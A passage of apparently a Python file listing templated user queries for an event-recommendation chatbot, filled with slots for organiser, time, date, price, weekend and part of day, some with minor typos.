"I want to know if there are events at {time} by {event_host}?",
"I want to know if there are events organised by {event_host} at {time}?",
"I want to know if there are events by {event_host} at {time}?",
"Do you know any events start at {time} organised by {event_host}?",
"Do you know any events start at {time} by {event_host}?",
"Do you know any events organised by {event_host} start at {time}?",
"Do you know any events by {event_host} start at {time}?",
"Can you recommend any event begins around {time} organised by {event_host}?",
"Can you recommend any event begins around {time} by {event_host}?",
"Can you recommend any event organised by {event_host} begins around {time}?",
"Can you recommend any event by {event_host} begins around {time}?",
"Can I know some events at around {time} organised by {event_host}?",
"Can I know some events at around {time} by {event_host}?",
"Can I know some events organised by {event_host} at around {time}?",
"Can I know some events by {event_host} at around {time}?",
]
inform_event_host_and_price_template = [
"Do you know any free events organised by {event_host}?",
"Do you know any free events by {event_host}?",
"Tell me about some free events organised by {event_host}.",
"Tell me about some free events by {event_host}.",
"Can you recommend me some free events organised by {event_host}?",
"Can you recommend me some free events by {event_host}?",
"Do you have any suggestions for free events organised by {event_host}?",
"Do you have any suggestions for free events by {event_host}?",
"Are there any events around {price} dollars organised by {event_host}?",
"Are there any events around {price} dollars by {event_host}?",
"Are there any events organised by {event_host} around {price} dollars?",
"Are there any events by {event_host} around {price} dollars?",
"Are there any events less than {price} dollars organised by {event_host}?",
"Are there any events less than {price} dollars by {event_host}?",
"Are there any events which is organised by {event_host} and less than {price} dollars?",
"Are there any events by {event_host} and less than {price} dollars?",
"Are there any events around ${price} organised by {event_host}.",
"Are there any events around ${price} by group {event_host}.",
"Are there any events around ${price} by {event_host}.",
"I would like to find an event that costs {price} dollars and organised by {event_host}.",
"I would like to find an event that costs {price} dollars and by {event_host}.",
"I would like to find an event organised by {event_host} that costs {price} dollars.",
"I would like to find an event by {event_host} that costs {price} dollars.",
"I would like to find an event that costs ${price} and is organised by {event_host}.",
"I would like to find an event that costs ${price} by {event_host}.",
"I would like to find an event organised by {event_host} that costs ${price}.",
"I would like to find an event by {event_host} that costs ${price}.",
"Let me know if there are events organised by {event_host} that are around {price} dollars.",
"Let me know if there are events by {event_host} that are around {price} dollars.",
"Let me know if there are events organised by {event_host} that are less than {price} dollars.",
"Let me know if there are events by the group {event_host} that are less than {price} dollars.",
"Let me know if there are events organised by {event_host} that are around ${price}.",
"Let me know if there are events by the group {event_host} that are around ${price}.",
"Will there be events that cost less than {price} dollars and is organised by {event_host}?",
"Will there be events that cost less than {price} dollars and is organised by the group {event_host}?",
"Will there be events organised by {event_host} that cost less than {price} dollars?",
"Will there be events by {event_host} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars and is organised by {event_host}?",
"Will there be events that cost around {price} dollars by {event_host}?",
"Will there be events organised by {event_host} that cost around {price} dollars?",
"Will there be events organised by the group {event_host} that cost around {price} dollars?",
"Will there be events by {event_host} that cost around {price} dollars?",
"Will there be events that cost ${price} and is organised by {event_host}?",
"Will there be events that cost ${price} and is organised by the group {event_host}?",
"Will there be events organised by {event_host} that cost ${price}?",
"Will there be events by the group {event_host} that cost ${price}?",
"Will there be events by {event_host} that cost ${price}?"
]
inform_event_host_and_is_weekend_template = [
"Tell me about events that on {is_weekend} organised by {event_host}.",
"Tell me about events that on {is_weekend} by {event_host}.",
"Tell me about events organised by {event_host} that are on {is_weekend}.",
"Tell me about events by {event_host} that are on {is_weekend}.",
"Tell me about events by the group {event_host} that are on {is_weekend}.",
"Which events take place on {is_weekend} and are organised by {event_host}.",
"Which events take place on {is_weekend} and are by the group {event_host}.",
"Which events organised by {event_host} take place on {is_weekend}.",
"Which events by {event_host} take place on {is_weekend}.",
"Which events organised by the group {event_host} take place on {is_weekend}.",
"I would like to find an event that is on {is_weekend} and is organised by {event_host}.",
"I would like to find an event that is on {is_weekend} and by {event_host}.",
"I would like to find an event that is on {is_weekend} and is organised by the group {event_host}.",
"I would like to find an event organised by {event_host} that is on {is_weekend}.",
"I would like to find an event organised by the group {event_host} that is on {is_weekend}.",
"I would like to find an event by {event_host} that is on {is_weekend}.",
"What events organised by {event_host} are conducted on {is_weekend}.",
"What events by {event_host} are conducted on {is_weekend}.",
"What events organised by the group {event_host} are conducted on {is_weekend}.",
"What events are conducted on {is_weekend} and are organised by {event_host}.",
"Will there be events that take place on {is_weekend}, organised by {event_host}?",
"Will there be events that take place on {is_weekend}, by the group {event_host}?",
"Will there be events organised by {event_host} that take place on {is_weekend}?",
"Will there be events by the group {event_host} that take place on {is_weekend}?",
"I want to know the events that are available on {is_weekend}, organised by {event_host}.",
"I want to know the events that are available on {is_weekend}, by {event_host}.",
"I want to know the events that are available on {is_weekend}, by the group {event_host}.",
"I want to know the events organised by {event_host} that are available on {is_weekend}.",
"I want to know the events by the group {event_host} that are available on {is_weekend}.",
"Can you recommend some events on {is_weekend}, organised by {event_host}?",
"Can you recommend some events on {is_weekend}, by the group {event_host}?",
"Can you recommend some events on {is_weekend}, with {event_host}?",
"Can you recommend some events organised by {event_host} on {is_weekend}?",
"Can you recommend some events by the group {event_host} on {is_weekend}?",
"Can you recommend some events with {event_host} on {is_weekend}?",
"Can you recommend some events with the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events on {is_weekend} with {event_host}?",
"Do you have any suggestions on events on {is_weekend} with the group {event_host}?",
"Do you have any suggestions on events on {is_weekend} organised by the group {event_host}?",
"Do you have any suggestions on events on {is_weekend} by the group {event_host}?",
"Do you have any suggestions on events on {is_weekend} by {event_host}?",
"Do you have any suggestions on events with {event_host} on {is_weekend}?",
"Do you have any suggestions on events with the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events organised by the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events by the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events by {event_host} on {is_weekend}?",
"I want to find some events on {is_weekend}, with the group {event_host}.",
"I want to find some events on {is_weekend}, organised by group {event_host}.",
"I want to find some events on {is_weekend}, organised by {event_host}.",
"I want to find some events with {event_host} on {is_weekend}.",
"I want to find some events with the group {event_host} on {is_weekend}.",
"I want to find some events organised by group {event_host} on {is_weekend}.",
"I want to find some events organised by {event_host} on {is_weekend}.",
"I want to find some events with {event_host} on {is_weekend}."
]
inform_event_host_and_part_of_day_template = [
"Tell me about events organised by {event_host} that are in {part_of_day}.",
"Tell me about events with the group {event_host} that are in {part_of_day}.",
"Tell me about events by {event_host} that are in {part_of_day}.",
"Tell me about events with {event_host} that are in {part_of_day}.",
"Tell me about events that are in {part_of_day} and are organised by {event_host}.",
"Tell me about events that are in {part_of_day} and with the group {event_host}.",
"Which events take place on {part_of_day} and are organised by {event_host}.",
"Which events take place on {part_of_day} and are by {event_host}.",
"Which events take place on {part_of_day} and with the group {event_host}.",
"Which events organised by {event_host} take place on {part_of_day}.",
"Which events by {event_host} take place on {part_of_day}.",
"Which events with the group {event_host} take place on {part_of_day}.",
"I would like to find an event that is in {part_of_day} and is organised by {event_host}.",
"I would like to find an event that is in {part_of_day} and by {event_host}.",
"I would like to find an event organised by {event_host} that is in {part_of_day}.",
"I would like to find an event by {event_host} that is in {part_of_day}.",
"I would like to find an event with the group {event_host} that is in {part_of_day}.",
"What events organised by the group {event_host} are conducted on {part_of_day}.",
"What events organised by {event_host} are conducted on {part_of_day}.",
"What events by the group {event_host} are conducted on {part_of_day}.",
"What events with the group {event_host} are conducted on {part_of_day}.",
"What events are conducted on {part_of_day} and are organised by the group {event_host}.",
"What events are conducted on {part_of_day} and are organised by {event_host}.",
"What events are conducted on {part_of_day} and are by the group {event_host}.",
"What events are conducted on {part_of_day} with the group {event_host}.",
"Will there be events that take place in {part_of_day}, organised by {event_host}?",
"Will there be events that take place in {part_of_day}, by {event_host}?",
"Will there be events organised by {event_host} that take place in {part_of_day}?",
"Will there be events by {event_host} that take place in {part_of_day}?",
"I want to know the events that are available at {part_of_day} with the group {event_host}.",
"I want to know the events that are available at {part_of_day} organised by the group {event_host}.",
"I want to know the events that are available at {part_of_day} by the group {event_host}.",
"I want to know the events that are available at {part_of_day} by {event_host}.",
"I want to know the events with the group {event_host} that are available at {part_of_day}.",
"I want to know the events organised by the group {event_host} that are available at {part_of_day}.",
"I want to know the events by the group {event_host} that are available at {part_of_day}.",
"I want to know the events by {event_host} that are available at {part_of_day}.",
"Can you recommend some events start at {part_of_day} and are organised by {event_host}?",
"Can you recommend some events start at {part_of_day} and are with the group {event_host}?",
"Can you recommend some events start at {part_of_day}, by {event_host}?",
"Can you recommend some events organised by {event_host} and start at {part_of_day}?",
"Can you recommend some events with the group {event_host} which start at {part_of_day}?",
"Can you recommend some events by {event_host}, which start at {part_of_day}?",
"Do you know any events begins in {part_of_day} and organised by {event_host}?",
"Do you know any events begins in {part_of_day}, organised by {event_host}?",
"Do you know any events begins in {part_of_day} with the group {event_host}?",
"Do you know any events begins in {part_of_day}, with {event_host}?",
"Do you know any events organised by {event_host} that begins in {part_of_day}?",
"Do you know any events organised by {event_host} that begins in {part_of_day}?",
"Do you know any events with the group {event_host} that begins in {part_of_day}?",
"Do you know any events with {event_host} which begins in {part_of_day}?",
"Do you have any suggestions on events by {event_host} in {part_of_day}?",
"Do you have any suggestions on events organised by {event_host} in {part_of_day}?",
"Do you have any suggestions on events with {event_host} in {part_of_day}?",
"Do you have any suggestions on events with the group {event_host} in {part_of_day}?",
"I want to find some events in {part_of_day}, organised by {event_host}.",
"I want to find some events in {part_of_day}, by {event_host}.",
"I want to find some events in {part_of_day}, with {event_host}.",
"I want to find some events organised by {event_host}, in {part_of_day}.",
"I want to find some events by {event_host} in {part_of_day}.",
"I want to find some events with {event_host} in {part_of_day}."
]
inform_date_start_and_time_template = [
"I want to know what events are occurring on {date_start} at {time}.",
"I want to know what events are occurring on {date_start} around {time}.",
"I want to know what events are holding on {date_start} at {time}.",
"I want to know what events are holding on {date_start} around {time}.",
"Are there any events on {date_start} at {time}?",
"Are there any events on {date_start} around {time}?",
"Are there any events holding on {date_start} at {time}?",
"Are there any events holding on {date_start} around {time}?",
"Are there any events occurring on {date_start} at {time}?",
"Are there any events occurring on {date_start} around {time}?",
"What events are on {date_start} at {time}?",
"What events are on {date_start} around {time}?",
"What events are holding on {date_start} at {time}?",
"What events are holding on {date_start} around {time}?",
"What events are occurring on {date_start} at {time}?",
"What events are occurring on {date_start} around {time}?",
"Does {date_start} around {time} have events I can attend?",
"Does {date_start} at {time} have events I can attend?",
"Will there be any events on {date_start} at {time}?",
"Will there be any events on {date_start} around {time}?",
"Will there be any events holding on {date_start} at {time}?",
"Will there be any events holding on {date_start} around {time}?",
"Will there be any events occurring on {date_start} at {time}?",
"Will there be any events occurring on {date_start} around {time}?",
"Can you recommend me some events on {date_start} at {time}?",
"Can you recommend me some events on {date_start} around {time}?",
"Can you recommend me some events holding on {date_start} at {time}?",
"Can you recommend me some events holding on {date_start} around {time}?",
"Can you recommend me some events occurring on {date_start} at {time}?",
"Can you recommend me some events occurring on {date_start} around {time}?",
"Do you kow any events holding on {date_start} at {time}?",
"Do you kow any events holding on {date_start} around {time}?",
"Do you kow any events occurring on {date_start} at {time}?",
"Do you kow any events occurring on {date_start} around {time}?",
"Do you kow any events on {date_start} at {time}?",
"Do you kow any events on {date_start} around {time}?",
"Do you have any suggestions on events on {date_start} at {time}?",
"Do you have any suggestions on events on {date_start} around {time}?",
"Do you have any suggestions on events holding on {date_start} at {time}?",
"Do you have any suggestions on events holding on {date_start} around {time}?",
"Do you have any suggestions on events occurring on {date_start} at {time}?",
"Do you have any suggestions on events occurring on {date_start} around {time}?"
]
inform_date_start_and_price_template = [
"Do you know any free events holding on {date_start}?",
"Do you know any free events occurring on {date_start}?",
"Do you know any free events on on {date_start}?",
"Tell me about some free events holding on {date_start}.",
"Tell me about some free events occuring on {date_start}.",
"Tell me about some free events on {date_start}.",
"Can you recommend me some free events holding on {date_start}?",
"Can you recommend me some free events occurring on {date_start}?",
"Can you recommend me some free events on {date_start}?",
"Do you have any suggestions for free events holding on {date_start}?",
"Do you have any suggestions for free events occurring on {date_start}?",
"Do you have any suggestions for free events on {date_start}?",
"Are there any events around {price} dollars holding on {date_start}.",
"Are there any events around {price} dollars occurring on {date_start}.",
"Are there any events around {price} dollars on {date_start}.",
"Are there any events holding on {date_start} which are around {price} dollars.",
"Are there any events occurring on {date_start} that are around {price} dollars.",
"Are there any events on {date_start} that are around {price} dollars.",
"Are there any events less than {price} dollars holding on {date_start}.",
"Are there any events less than {price} dollars occurring on {date_start}.",
"Are there any events less than {price} dollars on {date_start}.",
"Are there any events holding on {date_start} that are less than {price} dollars.",
"Are there any events occurring on {date_start} which are less than {price} dollars.",
"Are there any events on {date_start} that are less than {price} dollars.",
"Are there any events around ${price} holding on {date_start}.",
"Are there any events around ${price} occurring on {date_start}.",
"Are there any events around ${price} on {date_start}.",
"Are there any events holding on {date_start} that are around ${price}.",
"Are there any events occurring on {date_start} that are around ${price}.",
"Are there any events on {date_start} which are around ${price}.",
"I would like to find an event that costs {price} dollars, holding on {date_start}.",
"I would like to find an event that costs {price} dollars, occurring on {date_start}.",
"I would like to find an event that costs {price} dollars, on {date_start}.",
"I would like to find an event holding on {date_start} that costs {price} dollars.",
"I would like to find an event occurring on {date_start} that costs {price} dollars.",
"I would like to find an event on {date_start} that costs {price} dollars.",
"I would like to find an event holding on {date_start} that costs ${price}.",
"I would like to find an event occurring on {date_start} that costs ${price}.",
"I would like to find an event on {date_start} that costs ${price}.",
"Let me know if there are events that are around {price} dollars holding on {date_start}.",
"Let me know if there are events that are around {price} dollars occurring on {date_start}.",
"Let me know if there are events that are around {price} dollars on {date_start}.",
"Let me know if there are events holding on {date_start} that are around {price} dollars.",
"Let me know if there are events occurring on {date_start} that are around {price} dollars.",
"Let me know if there are events on {date_start} that are around {price} dollars.",
"Let me know if there are events that are less than {price} dollars holding on {date_start}.",
"Let me know if there are events that are less than {price} dollars occurring on {date_start}.",
"Let me know if there are events that are less than {price} dollars on {date_start}.",
"Let me know if there are events holding on {date_start} that are less than {price} dollars.",
"Let me know if there are events occurring on {date_start} that are less than {price} dollars.",
"Let me know if there are events on {date_start} that are less than {price} dollars.",
"Let me know if there are events that are around ${price} holding on {date_start}.",
"Let me know if there are events that are around ${price} occurring on {date_start}.",
"Let me know if there are events that are around ${price} on {date_start}.",
"Let me know if there are events holding on {date_start} that are around ${price}.",
"Let me know if there are events occurring on {date_start} that are around ${price}.",
"Let me know if there are events on {date_start} that are around ${price}.",
"Will there be events that cost less than {price} dollars holding on {date_start}?",
"Will there be events that cost less than {price} dollars occurring on {date_start}?",
"Will there be events that cost less than {price} dollars on {date_start}?",
"Will there be events holding on {date_start} that cost less than {price} dollars?",
"Will there be events occurring on {date_start} that cost less than {price} dollars?",
"Will there be events on {date_start} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars holding on {date_start}?",
"Will there be events that cost around {price} dollars occurring on {date_start}?",
"Will there be events that cost around {price} dollars on {date_start}?",
"Will there be events holding on {date_start} that cost around {price} dollars?",
"Will there be events occurring on {date_start} that cost around {price} dollars?",
"Will there be events on {date_start} that cost around {price} dollars?",
"Will there be events that cost ${price} holding on {date_start}?",
"Will there be events that cost ${price} occurring on {date_start}?",
"Will there be events that cost ${price} on {date_start}?",
"Will there be events holding on {date_start} that cost ${price}?",
"Will there be events occurring on {date_start} that cost ${price}?",
"Will there be events on {date_start} that cost ${price}?"
]
inform_date_start_and_part_of_day_template = [
"Tell me about events that are in {part_of_day} of {date_start}.",
"Tell me about events that are on {date_start} in {part_of_day}.",
"Tell me about events that are holding on {date_start} in {part_of_day}.",
"Tell me about events that are occurring on {date_start} in {part_of_day}.",
"Which events take place on {date_start} in the {part_of_day}.",
"I would like to find an event holding on {date_start} that is in {part_of_day}.",
"I would like to find an event on {date_start} that is in {part_of_day}.",
"I would like to find an event occurring on {date_start} that is in {part_of_day}.",
"What events are conducted on {date_start} in the {part_of_day}.",
"What events are conducted on {date_start} at {part_of_day}.",
"Will there be events that take place on {date_start} in {part_of_day}?",
"I want to know the events that are available on {date_start} at {part_of_day}.",
"I want to know the events that are available on {date_start} in the {part_of_day}.",
"Can you recommend some events holding on {date_start} start at {part_of_day}?",
"Can you recommend some events occurring on {date_start} start at {part_of_day}?",
"Can you recommend some events on {date_start} start at {part_of_day}?",
"Do you know any events on {date_start} begins in {part_of_day}?",
"Do you know any events holding on {date_start} begins in {part_of_day}?",
"Do you know any events occurring on {date_start} begins in {part_of_day}?",
"Do you know any events take palce {date_start} begins in {part_of_day}?",
"Do you have any suggestions on events holding on {date_start} in {part_of_day}?",
"Do you have any suggestions on events occurring on {date_start} in {part_of_day}?",
"I want to find some events holding on {date_start} in {part_of_day}.",
"I want to find some events occuring on {date_start} in {part_of_day}.",
"I want to find some events take place on {date_start} in {part_of_day}.",
"I want to find some events on {date_start} in {part_of_day}."
]
inform_time_and_price_template = [
"Do you know any free events at {time}?",
"Do you know any free events around {time}?",
"Tell me about some free events at {time}.",
"Tell me about some free events around {time}.",
"Tell me about some free events at around {time}.",
"Can you recommend me some free events at {time}?",
"Can you recommend me some free events around {time}?",
"Do you have any suggestions for free events at {time}?",
"Do you have any suggestions for free events at around {time}?",
"Do you have any suggestions for free events around {time}?",
"Are there any events around {price} SGD at {time}.",
"Are there any events around {price} dollars, around {time}.",
"Are there any events around {price} dollar at around {time}.",
"Are there any events at {time} around {price} SGD.",
"Are there any events around {time} around {price} dollars.",
"Are there any events at around {time} around ${price}.",
"Are there any events less than {price} SGD at {time}.",
"Are there any events less than {price} dollars around {time}.",
"Are there any events less than {price} dollar at around {time}.",
"Are there any events at {time} less than {price} dollars.",
"Are there any events around {time} less than {price} SGD.",
"Are there any events at around {time} less than ${price}.",
"Are there any events around ${price} at {time}.",
"Are there any events around ${price} at around {time}.",
"Are there any events at {time} around ${price}.",
"Are there any events at around {time}, around ${price}.",
"I would like to find an event that costs {price} dollars at {time}.",
"I would like to find an event that costs {price} SGD around {time}.",
"I would like to find an event that costs {price} dollar at around {time}.",
"I would like to find an event beginning at {time} that costs {price} dollars.",
"I would like to find an event holding at {time} that costs {price} dollar.",
"I would like to find an event occurring at {time} that costs {price} SGD.",
"I would like to find an event at {time} that costs ${price}.",
"I would like to find an event around {time} that costs {price} dollars.",
"I would like to find an event at around {time} that costs {price} dollars.",
"I would like to find an event that costs ${price} holding at {time}.",
"I would like to find an event that costs ${price} occurring at {time}.",
"I would like to find an event that costs ${price} beginning at {time}.",
"I would like to find an event that costs ${price} ad begins at {time}.",
"I would like to find an event that costs ${price} at around {time}.",
"I would like to find an event that costs ${price} around {time}.",
"I would like to find an event at {time} that costs ${price}.",
"I would like to find an event at around {time} that costs ${price}.",
"I would like to find an event around {time} that costs ${price}.",
"Let me know if there are events that are around {price} SGD holding at {time}.",
"Let me know if there are events that are around {price} dollars occurring at {time}.",
"Let me know if there are events that are around {price} dollar at {time}.",
"Let me know if there are events that are around {price} dollar at around {time}.",
"Let me know if there are events that are around {price} dollars around {time}.",
"Let me know if there are events at {time} that are around {price} dollars.",
"Let me know if there are events at around {time} that are around {price} SGD.",
"Let me know if there are events around {time} that are around {price} dollars.",
"Let me know if there are events that are less than {price} dollars at {time}.",
"Let me know if there are events that are less than {price} SGD around {time}.",
"Let me know if there are events that are less than {price} dollar at around {time}.",
"Let me know if there are events at {time} that are less than {price} dollar.",
"Let me know if there are events around {time} that are less than {price} dollar.",
"Let me know if there are events at around {time} that are less than {price} SGD.",
"Let me know if there are events holding around {time} that are less than {price} dollar.",
"Let me know if there are events holding at around {time} that are less than {price} dollar.",
"Let me know if there are events that are around ${price} holding at {time}.",
"Let me know if there are events that are around ${price} holding at around {time}.",
"Let me know if there are events that are around ${price} at {time}.",
"Let me know if there are events that are around ${price} at around {time}.",
"Let me know if there are events holding at {time} that are around ${price}.",
"Let me know if there are events holding at around {time} that are around ${price}.",
"Let me know if there are events at {time} that are around ${price}.",
"Let me know if there are events at around {time} that are around ${price}.",
"Will there be events that cost less than {price} SGD holding at {time}?",
"Will there be events that cost less than {price} SGD occurring at {time}?",
"Will there be events that cost less than {price} dollars at {time}?",
"Will there be events that cost less than {price} dollars holding at around {time}?",
"Will there be events holding at {time} that cost less than {price} SGD?",
"Will there be events occurring at {time} that cost less than {price} SGD?",
"Will there be events at {time} that cost less than {price} dollar?",
"Will there be events holding at around {time} that cost less than {price} dollar?",
"Will there be events beginning at around {time} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars, holding at {time}?",
"Will there be events that cost around {price} dollar, at {time}?",
"Will there be events that cost around {price} SGD, occuring at {time}?",
"Will there be events that cost around {price} dollar, at around {time}?",
"Will there be events holding at {time} that cost around {price} dollars?",
"Will there be events at {time} that cost around {price} dollars?",
"Will there be events occuring at {time} that cost around {price} SGD?",
"Will there be events at around {time} that cost around {price} SGD?",
"Will there be events that cost ${price} holding at {time}?",
"Will there be events that cost ${price} occuring at {time}?",
"Will there be events that cost ${price} at {time}?",
"Will there be events that cost ${price} holding at around {time}?",
"Will there be events that cost ${price} begin at around {time}?"
]
inform_time_and_is_weekend_template = [
"I would like to know about events that are around {time} on {is_weekend}.",
"I would like to know about events on {is_weekend} that are around {time}.",
"Are there any events that start at {time} on {is_weekend}?",
"Are there any events on {is_weekend} that start at {time}?",
"Tell me about events around {time} on {is_weekend}.",
"Tell me about events on {is_weekend} around {time}.",
"Will there be any events around {time} on {is_weekend}?",
"Will there be any events on {is_weekend} around {time}?",
"I want to know if there are events at {time} on {is_weekend}?",
"I want to know if there are events on {is_weekend} at {time}?",
"Do you know any events start at {time} on {is_weekend}?",
"Do you know any events on {is_weekend} start at {time}?",
"Can you recommend any event begins around {time} on {is_weekend}?",
"Can you recommend any event on {is_weekend} begins around {time}?",
"Can I know some events at around {time} on {is_weekend}?",
"Can I know some events on {is_weekend} at around {time}?",
"I would like to know about events holding around {time} on {is_weekend}.",
"I would like to know about events holding on {is_weekend} around {time}.",
"I would like to know about events occurring around {time} on {is_weekend}.",
"I would like to know about events occurring on {is_weekend} around {time}.",
"Tell me about events holding around {time} on {is_weekend}.",
"Tell me about events holding on {is_weekend} around {time}.",
"Tell me about events occurring around {time} on {is_weekend}.",
"Tell me about events occurring on {is_weekend} around {time}.",
"Will there be any events holding around {time} on {is_weekend}?",
"Will there be any events holding on {is_weekend} around {time}?",
"Will there be any events occurring around {time} on {is_weekend}?",
"I want to know if there are events holding at {time} on {is_weekend}?",
"I want to know if there are events holding on {is_weekend} at {time}?",
"I want to know if there are events occurring at {time} on {is_weekend}?",
"I want to know if there are events occurring on {is_weekend} at {time}?",
"Can you recommend any event begins around {time} on {is_weekend}?",
"Can you recommend any event on {is_weekend} begins around {time}?",
"Can I know some events that begin at around {time} on {is_weekend}?",
"Can I know some events on {is_weekend} that begin at around {time}?",
"Can I know some events beginning at around {time} on {is_weekend}?",
"Can I know some events on {is_weekend} beginning at around {time}?"
]
inform_price_and_is_weekend_template = [
"Do you know any free events on {is_weekend}?",
"Do you know any free events holding on {is_weekend}?",
"Do you know any free events occurring on {is_weekend}?",
"Do you know any free events taking place on {is_weekend}?",
"Tell me about some free events on {is_weekend}.",
"Tell me about some free events holding on {is_weekend}.",
"Tell me about some free events occuring on {is_weekend}.",
"Tell me about some free events that take place on {is_weekend}.",
"Tell me about some free events taking place on {is_weekend}.",
"Can you recommend me some free events taking place on {is_weekend}?",
"Can you recommend me some free events that take place on {is_weekend}?",
"Can you recommend me some free events holding on {is_weekend}?",
"Can you recommend me some free events occurring on {is_weekend}?",
"Can you recommend me some free events on {is_weekend}?",
"Do you have any suggestions for free events occurring on {is_weekend}?",
"Do you have any suggestions for free events holding on {is_weekend}?",
"Do you have any suggestions for free events on {is_weekend}?",
"Do you have any suggestions for free events taking place on {is_weekend}?",
"Do you have any suggestions for free events that take place on {is_weekend}?",
"Are there any events around {price} dollars taking place on {is_weekend}.",
"Are there any events around {price} dollars holing on {is_weekend}.",
"Are there any events around {price} dollars occuring on {is_weekend}.",
"Are there any events around {price} dollars that take place on {is_weekend}.",
"Are there any events dollars taking place on {is_weekend} around {price} SGD.",
"Are there any events dollars holing on {is_weekend} around {price} SGD.",
"Are there any events dollars occuring on {is_weekend} around {price} SGD.",
"Are there any events dollars that take place on {is_weekend} around {price} SGD.",
"Are there any events less than {price} dollars on {is_weekend}.",
"Are there any events less than {price} dollars holding on {is_weekend}.",
"Are there any events less than {price} dollars taking place on {is_weekend}.",
"Are there any events less than {price} dollars occurring on {is_weekend}.",
"Are there any events less than {price} dollars that take place on {is_weekend}.",
"Are there any events on {is_weekend} that are less than {price} dollars.",
"Are there any events holding on {is_weekend} that are less than {price} dollars.",
"Are there any events taking place on {is_weekend} that are less than {price} dollars.",
"Are there any events occurring on {is_weekend} that are less than {price} dollars.",
"Are there any events around ${price} holding on {is_weekend}.",
"Are there any events around ${price} occurring on {is_weekend}.",
"Are there any events around ${price} on {is_weekend}.",
"Are there any events around ${price} taking place on {is_weekend}.",
"Are there any events holding on {is_weekend} that are around ${price}.",
"Are there any events occurring on {is_weekend} that are around ${price}.",
"Are there any events on {is_weekend} around ${price}.",
"Are there any events taking place on {is_weekend} and are around ${price}.",
"I would like to find an event that costs {price} dollars on {is_weekend}.",
"I would like to find an event that costs {price} dollars holding on {is_weekend}.",
"I would like to find an event that costs {price} dollars occurring on {is_weekend}.",
"I would like to find an event that costs {price} dollars taking place on {is_weekend}.",
"I would like to find an event on {is_weekend} that costs {price} dollars.",
"I would like to find an event holding on {is_weekend} that costs {price} dollars.",
"I would like to find an event occurring on {is_weekend} that costs {price} dollars.",
"I would like to find an event taking place on {is_weekend} that costs {price} dollars.",
"I would like to find an event that costs ${price} on {is_weekend}.",
"I would like to find an event that costs ${price} holding on {is_weekend}.",
"I would like to find an event that costs ${price} occurring on {is_weekend}.",
"I would like to find an event that costs ${price} taking place on {is_weekend}.",
"I would like to find an event on {is_weekend} that costs ${price}.",
"I would like to find an event holding on {is_weekend} that costs ${price}.",
"I would like to find an event occurring on {is_weekend} that costs ${price}.",
"I would like to find an event taking place on {is_weekend} that costs ${price}.",
"Let me know if there are events that are around {price} dollars on {is_weekend}.",
"Let me know if there are events that are around {price} dollars holding on {is_weekend}.",
"Let me know if there are events that are around {price} dollars occurring on {is_weekend}.",
"Let me know if there are events that are around {price} dollars taking plae on {is_weekend}.",
"Let me know if there are events on {is_weekend} that are around {price} dollars.",
"Let me know if there are events holding on {is_weekend} that are around {price} dollars.",
"Let me know if there are events occurring on {is_weekend} that are around {price} dollars.",
"Let me know if there are events taking plae on {is_weekend} that are around {price} dollars.",
"Let me know if there are events that are less than {price} dollars on {is_weekend}.",
"Let me know if there are events that are less than {price} dollars holding on {is_weekend}.",
"Let me know if there are events that are less than {price} dollars occurring on {is_weekend}.",
"Let me know if there are events that are less than {price} dollars taking place on {is_weekend}.",
"Let me know if there are events on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events holding on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events occurring on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events taking place on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events that are around ${price} on {is_weekend}.",
"Let me know if there are events that are around ${price} holding on {is_weekend}.",
"Let me know if there are events that are around ${price} occurring on {is_weekend}.",
"Let me know if there are events that are around ${price} taking plcae on {is_weekend}.",
"Let me know if there are events on {is_weekend} that are around ${price}.",
"Let me know if there are events holding on {is_weekend} that are around ${price}.",
"Let me know if there are events occurring on {is_weekend} that are around ${price}.",
"Let me know if there are events taking plcae on {is_weekend} that are around ${price}.",
"Will there be events that cost less than {price} dollars on {is_weekend}?",
"Will there be events that cost less than {price} dollars holding on {is_weekend}?",
"Will there be events that cost less than {price} dollars occurring on {is_weekend}?",
"Will there be events that cost less than {price} dollars taking place on {is_weekend}?",
"Will there be events on {is_weekend} that cost less than {price} dollars?",
"Will there be events holding on {is_weekend} that cost less than {price} dollars?",
"Will there be events occurring on {is_weekend} that cost less than {price} dollars?",
"Will there be events taking place on {is_weekend} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars on {is_weekend}?",
"Will there be events that cost around {price} dollars holding on {is_weekend}?",
"Will there be events that cost around {price} dollars occurring on {is_weekend}?",
"Will there be events that cost around {price} dollars taking place on {is_weekend}?",
"Will there be events on {is_weekend} that cost around {price} dollars?",
"Will there be events holding on {is_weekend} that cost around {price} dollars?",
"Will there be events occurring on {is_weekend} that cost around {price} dollars?",
"Will there be events taking place on {is_weekend} that cost around {price} dollars?",
"Will there be events that cost ${price} on {is_weekend}?",
"Will there be events that cost ${price} holding on {is_weekend}?",
"Will there be events that cost ${price} occurring on {is_weekend}?",
"Will there be events that cost ${price} taking plcae on {is_weekend}?",
"Will there be events on {is_weekend} that cost ${price}?",
"Will there be events holding on {is_weekend} that cost ${price}?",
"Will there be events occurring on {is_weekend} that cost ${price}?",
"Will there be events taking plcae on {is_weekend} that cost ${price}?"
]
inform_price_and_part_of_day_template = [
"Do you know any free events in the {part_of_day}?",
"Do you know any free events holding in the {part_of_day}?",
"Tell me about some free events in the {part_of_day}.",
"Tell me about some free events occurring in the {part_of_day}.",
"Can you recommend me some free events at {part_of_day}?",
"Do you have any suggestions for free events in the {part_of_day}?",
"Do you have any suggestions for free events holding in the {part_of_day}?",
"Are there any events around {price} dollars in the {part_of_day}.",
"Are there any events in the {part_of_day} which are around {price} dollars.",
"Are there any events holding in the {part_of_day} which are around {price} dollars.",
"Are there any events around {price} SGD at {part_of_day}.",
"Are there any events at {part_of_day} around {price} SGD.",
"Are there any events at {part_of_day} which are around {price} SGD.",
"Are there any events less than {price} dollars in the {part_of_day}.",
"Are there any events less than {price} dollars occurring in the {part_of_day}.",
"Are there any events in the {part_of_day} which are less than {price} dollars.",
"Are there any events occurring in the {part_of_day} which are less than {price} dollars.",
"Are there any events less than {price} SGD holding in the {part_of_day}.",
